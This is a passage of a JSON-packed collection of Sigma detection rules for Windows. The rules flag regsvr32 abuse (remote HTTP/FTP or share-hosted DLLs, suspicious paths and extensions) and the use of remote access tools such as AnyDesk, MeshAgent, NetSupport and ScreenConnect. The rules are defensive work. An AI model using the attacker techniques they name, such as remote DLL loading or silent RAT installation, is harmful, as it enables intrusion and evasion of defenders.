    "content": "title: Potentially Suspicious Regsvr32 HTTP/FTP Pattern\nid: 867356ee-9352-41c9-a8f2-1be690d78216\nrelated:\n    - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d\n      type: obsolete\nstatus: test\ndescription: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.\nreferences:\n    - https://twitter.com/mrd0x/status/1461041276514623491\n    - https://twitter.com/tccontre18/status/1480950986650832903\n    - https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-05-24\nmodified: 2023-05-26\ntags:\n    - attack.defense-evasion\n    - attack.t1218.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\regsvr32.exe'\n        - OriginalFileName: 'REGSVR32.EXE'\n    selection_flag:\n        CommandLine|contains:\n            - ' /i'\n            - ' -i'\n    selection_protocol:\n        CommandLine|contains:\n            - 'ftp'\n            - 'http'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regsvr32_remote_share.yml",
    "content": "title: Suspicious Regsvr32 Execution From Remote Share\nid: 88a87a10-384b-4ad7-8871-2f9bf9259ce5\nstatus: test\ndescription: Detects REGSVR32.exe to execute DLL hosted on remote shares\nreferences:\n    - https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-31\ntags:\n    - attack.defense-evasion\n    - attack.t1218.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\regsvr32.exe'\n        - OriginalFileName: '\\REGSVR32.EXE'\n    selection_cli:\n        CommandLine|contains: ' \\\\\\\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\n# Decrease to medium if this is something common in your org\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml",
    "content": "title: Potentially Suspicious Child Process Of Regsvr32\nid: 6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca\nrelated:\n    - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d\n      type: obsolete\nstatus: test\ndescription: Detects potentially suspicious child processes of \"regsvr32.exe\".\nreferences:\n    - https://redcanary.com/blog/intelligence-insights-april-2022/\n    - https://www.echotrail.io/insights/search/regsvr32.exe\n    - https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo\nauthor: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-05-05\nmodified: 2023-05-26\ntags:\n    - attack.defense-evasion\n    - attack.t1218.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\regsvr32.exe'\n        Image|endswith:\n            - '\\calc.exe'\n            - '\\cscript.exe'\n            - '\\explorer.exe'\n            - '\\mshta.exe'\n            - '\\net.exe'\n            - '\\net1.exe'\n            - '\\nltest.exe'\n            - '\\notepad.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\reg.exe'\n            - '\\schtasks.exe'\n            - '\\werfault.exe'\n            - '\\wscript.exe'\n    filter_main_werfault:\n        Image|endswith: '\\werfault.exe'\n        CommandLine|contains: ' -u -p '\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely, but can rarely occur. Apply additional filters accordingly.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml",
    "content": "title: Regsvr32 Execution From Potential Suspicious Location\nid: 9525dc73-0327-438c-8c04-13c0e037e9da\nrelated:\n    - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d\n      type: obsolete\nstatus: test\ndescription: Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.\nreferences:\n    - https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html\n    - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-26\ntags:\n    - attack.defense-evasion\n    - attack.t1218.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\regsvr32.exe'\n        - OriginalFileName: 'REGSVR32.EXE'\n    selection_cli:\n        CommandLine|contains:\n            - ':\\ProgramData\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n    condition: all of selection_*\nfalsepositives:\n    - Some installers might execute \"regsvr32\" with DLLs located in %TEMP% or in %PROGRAMDATA%. Apply additional filters if necessary.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml",
    "content": "title: Regsvr32 Execution From Highly Suspicious Location\nid: 327ff235-94eb-4f06-b9de-aaee571324be\nstatus: test\ndescription: Detects execution of regsvr32 where the DLL is located in a highly suspicious locations\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-26\ntags:\n    - attack.defense-evasion\n    - attack.t1218.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\regsvr32.exe'\n        - OriginalFileName: 'REGSVR32.EXE'\n    selection_path_1:\n        CommandLine|contains:\n            - ':\\PerfLogs\\'\n            - ':\\Temp\\'\n            - '\\Windows\\Registration\\CRMLog'\n            - '\\Windows\\System32\\com\\dmp\\'\n            - '\\Windows\\System32\\FxsTmp\\'\n            - '\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\'\n            - '\\Windows\\System32\\spool\\drivers\\color\\'\n            - '\\Windows\\System32\\spool\\PRINTERS\\'\n            - '\\Windows\\System32\\spool\\SERVERS\\'\n            - '\\Windows\\System32\\Tasks_Migrated\\'\n            - '\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\'\n            - '\\Windows\\SysWOW64\\com\\dmp\\'\n            - '\\Windows\\SysWOW64\\FxsTmp\\'\n            - '\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\'\n            - '\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\'\n            - '\\Windows\\Tasks\\'\n            - '\\Windows\\Tracing\\'\n    selection_path_2:\n        CommandLine|contains:\n            # This is to avoid collisions with CLI starting with \"C:\\\"\n            - ' \"C:\\'\n            - ' C:\\'\n            - \" 'C:\\\\\"\n            - 'D:\\'\n    selection_exclude_known_dirs:\n        CommandLine|contains:\n            # Note: add additional locations that are related to third party applications\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\ProgramData\\'\n            - 'C:\\Users\\'\n            # Note: The space added here are to avoid collisions with the \"regsvr32\" binary full path\n            - ' C:\\Windows\\'\n            - ' \"C:\\Windows\\'\n            - \" 'C:\\\\Windows\\\\\"\n    filter_main_empty:\n        CommandLine: ''\n    filter_main_null:\n        CommandLine: null\n    condition: selection_img and (selection_path_1 or (selection_path_2 and not selection_exclude_known_dirs)) and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regsvr32_susp_extensions.yml",
    "content": "title: Regsvr32 DLL Execution With Suspicious File Extension\nid: 089fc3d2-71e8-4763-a8a5-c97fbb0a403e\nrelated:\n    - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d\n      type: obsolete\nstatus: test\ndescription: Detects the execution of REGSVR32.exe with DLL files masquerading as other files\nreferences:\n    - https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\n    - https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html\n    - https://guides.lib.umich.edu/c.php?g=282942&p=1885348\n    - https://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\nauthor: Florian Roth (Nextron Systems), frack113\ndate: 2021-11-29\nmodified: 2025-08-27\ntags:\n    - attack.defense-evasion\n    - attack.t1218.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\regsvr32.exe'\n        - OriginalFileName: 'REGSVR32.EXE'\n    selection_cli:\n        CommandLine|endswith:\n            # Add more image extensions\n            # https://twitter.com/Max_Mal_/status/1542461200797163522/photo/3\n            - '.bin'\n            - '.bmp'\n            - '.cr2'\n            - '.dat'\n            - '.eps'\n            - '.gif'\n            - '.ico'\n            - '.jpeg'\n            - '.jpg'\n            - '.log'\n            - '.nef'\n            - '.orf'\n            - '.png'\n            - '.raw'\n            - '.rtf'\n            - '.sr2'\n            - '.temp'\n            - '.tif'\n            - '.tiff'\n            - '.tmp'\n            - '.txt'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml",
    "content": "title: Scripting/CommandLine Process Spawned Regsvr32\nid: ab37a6ec-6068-432b-a64e-2c7bf95b1d22\nrelated:\n    - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d\n      type: obsolete\nstatus: test\ndescription: Detects various command line and scripting engines/processes such as \"PowerShell\", \"Wscript\", \"Cmd\", etc. spawning a \"regsvr32\" instance.\nreferences:\n    - https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html\n    - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-26\ntags:\n    - attack.defense-evasion\n    - attack.t1218.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell_ise.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n        Image|endswith: '\\regsvr32.exe'\n    filter_main_rpcproxy:\n        ParentImage: C:\\Windows\\System32\\cmd.exe\n        CommandLine|endswith: ' /s C:\\Windows\\System32\\RpcProxy\\RpcProxy.dll'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate \".bat\", \".hta\", \".ps1\" or \".vbs\" scripts leverage legitimately often. Apply additional filter and exclusions as necessary\n    - Some legitimate Windows services\nlevel: medium # Can be reduced to low if you experience a ton of FP\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml",
    "content": "title: Regsvr32 DLL Execution With Uncommon Extension\nid: 50919691-7302-437f-8e10-1fe088afa145\nstatus: test\ndescription: Detects a \"regsvr32\" execution where the DLL doesn't contain a common file extension.\nreferences:\n    - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-07-17\nmodified: 2023-05-24\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\regsvr32.exe'\n        - OriginalFileName: 'REGSVR32.EXE'\n    filter_main_legit_ext:\n        CommandLine|contains:\n            # Note: For better accuracy you might not want to use contains\n            - '.ax'\n            - '.cpl'\n            - '.dll' # Covers \".dll.mui\"\n            - '.ocx'\n    filter_optional_pascal:\n        CommandLine|contains: '.ppl'\n    filter_optional_avg:\n        CommandLine|contains: '.bav'\n    filter_main_null_4688:\n        CommandLine: null\n    filter_main_empty_4688:\n        CommandLine: ''\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Other legitimate extensions currently not in the list either from third party or specific Windows components.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk.yml",
    "content": "title: Remote Access Tool - AnyDesk Execution\nid: b52e84a3-029e-4529-b09b-71d19dd27e94\nstatus: test\nrelated:\n    - id: 065b00ca-5d5c-4557-ac95-64a6d0b64d86\n      type: similar\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows\n    - https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/\nauthor: frack113\ndate: 2022-02-11\nmodified: 2025-02-24\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith:\n              - '\\AnyDesk.exe'\n              - '\\AnyDeskMSI.exe'\n        - Description: AnyDesk\n        - Product: AnyDesk\n        - Company: AnyDesk Software GmbH\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml",
    "content": "title: Remote Access Tool - AnyDesk Piped Password Via CLI\nid: b1377339-fda6-477a-b455-ac0923f9ec2c\nstatus: test\ndescription: Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.\nreferences:\n    - https://redcanary.com/blog/misbehaving-rats/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-28\nmodified: 2023-03-05\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            # Example: C:\\WINDOWS\\system32\\cmd.exe /C cmd.exe /c echo J9kzQ2Y0qO |C:\\ProgramData\\anydesk.exe --set-password\n            - '/c '\n            - 'echo '\n            - '.exe --set-password'\n    condition: selection\nfalsepositives:\n    - Legitimate piping of the password to anydesk\n    - Some FP could occur with similar tools that uses the same command line '--set-password'\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_revoked_cert.yml",
    "content": "title: Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate\nid: 41f407b5-3096-44ea-a74f-96d04fbc41be\nstatus: test\ndescription: |\n    Detects the execution of an AnyDesk binary with a version prior to 8.0.8.\n    Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors.\n    Use this rule to detect instances of older versions of Anydesk using the compromised certificate\n    This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/anydesk-says-hackers-breached-its-production-servers-reset-passwords/\n    - https://anydesk.com/en/changelog/windows\nauthor: Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-02-08\ntags:\n    - attack.execution\n    - attack.initial-access\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\AnyDesk.exe'\n        - Description: 'AnyDesk'\n        - Product: 'AnyDesk'\n        - Company: 'AnyDesk Software GmbH'\n    selection_version:\n        FileVersion|startswith:\n            - '7.0.'\n            - '7.1.'\n            - '8.0.1'\n            - '8.0.2'\n            - '8.0.3'\n            - '8.0.4'\n            - '8.0.5'\n            - '8.0.6'\n            - '8.0.7'\n    filter_main_uninstall:\n        CommandLine|contains:\n            - ' --remove'\n            - ' --uninstall'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml",
    "content": "title: Remote Access Tool - AnyDesk Silent Installation\nid: 114e7f1c-f137-48c8-8f54-3088c24ce4b9\nstatus: test\ndescription: Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.\nreferences:\n    - https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20\n    - https://support.anydesk.com/Automatic_Deployment\nauthor: Ján Trenčanský\ndate: 2021-08-06\nmodified: 2023-03-05\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '--install'\n            - '--start-with-win'\n            - '--silent'\n    condition: selection\nfalsepositives:\n    - Legitimate deployment of AnyDesk\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml",
    "content": "title: Remote Access Tool - Anydesk Execution From Suspicious Folder\nid: 065b00ca-5d5c-4557-ac95-64a6d0b64d86\nrelated:\n    - id: b52e84a3-029e-4529-b09b-71d19dd27e94\n      type: similar\nstatus: test\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows\n    - https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-05-20\nmodified: 2025-02-24\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith:\n              - '\\AnyDesk.exe'\n              - '\\AnyDeskMSI.exe'\n        - Description: AnyDesk\n        - Product: AnyDesk\n        - Company: AnyDesk Software GmbH\n    filter:\n        Image|contains:\n            - '\\AppData\\'\n            - 'Program Files (x86)\\AnyDesk'\n            - 'Program Files\\AnyDesk'\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate use of AnyDesk from a non-standard folder\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_gotoopener.yml",
    "content": "title: Remote Access Tool - GoToAssist Execution\nid: b6d98a4f-cef0-4abf-bbf6-24132854a83d\nstatus: test\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows\nauthor: frack113\ndate: 2022-02-13\nmodified: 2023-03-05\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Description: 'GoTo Opener'\n        - Product: 'GoTo Opener'\n        - Company: 'LogMeIn, Inc.'\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_logmein.yml",
    "content": "title: Remote Access Tool - LogMeIn Execution\nid: d85873ef-a0f8-4c48-a53a-6b621f11729d\nstatus: test\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows\nauthor: frack113\ndate: 2022-02-11\nmodified: 2023-03-05\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Description: LMIGuardianSvc\n        - Product: LMIGuardianSvc\n        - Company: LogMeIn, Inc.\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_meshagent_arguments.yml",
    "content": "title: Remote Access Tool - Potential MeshAgent Execution - Windows\nid: 2fbbe9ff-0afc-470b-bdc0-592198339968\nrelated:\n    - id: 22c45af6-f590-4d44-bab3-b5b2d2a2b6d9\n      type: similar\nstatus: experimental\ndescription: |\n    Detects potential execution of MeshAgent which is a tool used for remote access.\n    Historical data shows that threat actors rename MeshAgent binary to evade detection.\n    Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access.\nreferences:\n    - https://www.huntress.com/blog/know-thy-enemy-a-novel-november-case-on-persistent-remote-access\n    - https://thecyberexpress.com/ukraine-hit-by-meshagent-malware-campaign/\n    - https://wazuh.com/blog/how-to-detect-meshagent-with-wazuh/\n    - https://www.security.com/threat-intelligence/medusa-ransomware-attacks\nauthor: Norbert Jaśniewicz (AlphaSOC)\ndate: 2025-05-19\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: '--meshServiceName'\n    condition: selection\nfalsepositives:\n    - Environments that legitimately use MeshAgent\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_meshagent_exec.yml",
    "content": "title: Remote Access Tool - MeshAgent Command Execution via MeshCentral\nid: 74a2b202-73e0-4693-9a3a-9d36146d0775\nstatus: test\ndescription: |\n    Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly.\n    MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.\nreferences:\n    - https://github.com/Ylianst/MeshAgent\n    - https://github.com/Ylianst/MeshAgent/blob/52cf129ca43d64743181fbaf940e0b4ddb542a37/modules/win-dispatcher.js#L173\n    - https://github.com/Ylianst/MeshAgent/blob/52cf129ca43d64743181fbaf940e0b4ddb542a37/modules/win-info.js#L55\nauthor: '@Kostastsale'\ndate: 2024-09-22\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith: '\\meshagent.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n    condition: selection\nfalsepositives:\n    - False positives can be found in environments using MeshAgent for remote management, analysis should prioritize the grandparent process, MeshAgent.exe, and scrutinize the resulting child processes triggered by any suspicious interactive commands directed at the target host.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_netsupport.yml",
    "content": "title: Remote Access Tool - NetSupport Execution\nid: 758ff488-18d5-4cbe-8ec4-02b6285a434f\nstatus: test\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md\nauthor: frack113\ndate: 2022-09-25\nmodified: 2023-03-06\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Description: NetSupport Client Configurator\n        - Product: NetSupport Remote Control\n        - Company: NetSupport Ltd\n        - OriginalFileName: PCICFGUI.EXE\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml",
    "content": "title: Remote Access Tool - NetSupport Execution From Unusual Location\nid: 37e8d358-6408-4853-82f4-98333fca7014\nstatus: test\ndescription: Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\\Program Files')\nreferences:\n    - https://redcanary.com/blog/misbehaving-rats/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-19\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\client32.exe'\n        - Product|contains: 'NetSupport Remote Control'\n        - OriginalFileName|contains: 'client32.exe'\n        - Hashes|contains: IMPHASH=a9d50692e95b79723f3e76fcf70d023e\n    filter:\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_renamed_meshagent_execution.yml",
    "content": "title: Remote Access Tool - Renamed MeshAgent Execution - Windows\nid: b471f462-eb0d-4832-be35-28d94bdb4780\nrelated:\n    - id: bd3b5eaa-439d-4a42-8f35-a49f5c8a2582\n      type: similar\n    - id: 2fbbe9ff-0afc-470b-bdc0-592198339968\n      type: derived\nstatus: experimental\ndescription: |\n    Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent.\n    RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management.\n    However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems.\nreferences:\n    - https://www.huntress.com/blog/know-thy-enemy-a-novel-november-case-on-persistent-remote-access\n    - https://thecyberexpress.com/ukraine-hit-by-meshagent-malware-campaign/\n    - https://wazuh.com/blog/how-to-detect-meshagent-with-wazuh/\n    - https://www.security.com/threat-intelligence/medusa-ransomware-attacks\nauthor: Norbert Jaśniewicz (AlphaSOC)\ndate: 2025-05-19\ntags:\n    - attack.command-and-control\n    - attack.defense-evasion\n    - attack.t1219.002\n    - attack.t1036.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_meshagent:\n        - CommandLine|contains: '--meshServiceName'\n        - OriginalFileName|contains: 'meshagent'\n    filter_main_legitimate:\n        Image|endswith: '\\meshagent.exe'\n    condition: selection_meshagent and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml",
    "content": "title: Remote Access Tool - RURAT Execution From Unusual Location\nid: e01fa958-6893-41d4-ae03-182477c5e77d\nstatus: test\ndescription: Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\\Program Files')\nreferences:\n    - https://redcanary.com/blog/misbehaving-rats/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-19\nmodified: 2023-03-05\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith:\n              - '\\rutserv.exe'\n              - '\\rfusclient.exe'\n        - Product: 'Remote Utilities'\n    filter:\n        Image|startswith:\n            - 'C:\\Program Files\\Remote Utilities'\n            - 'C:\\Program Files (x86)\\Remote Utilities'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect.yml",
    "content": "title: Remote Access Tool - ScreenConnect Execution\nid: 57bff678-25d1-4d6c-8211-8ca106d12053\nstatus: test\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows\nauthor: frack113\ndate: 2022-02-13\nmodified: 2023-03-05\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Description: 'ScreenConnect Service'\n        - Product: 'ScreenConnect'\n        - Company: 'ScreenConnect Software'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of the tool\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_installation_cli_param.yml",
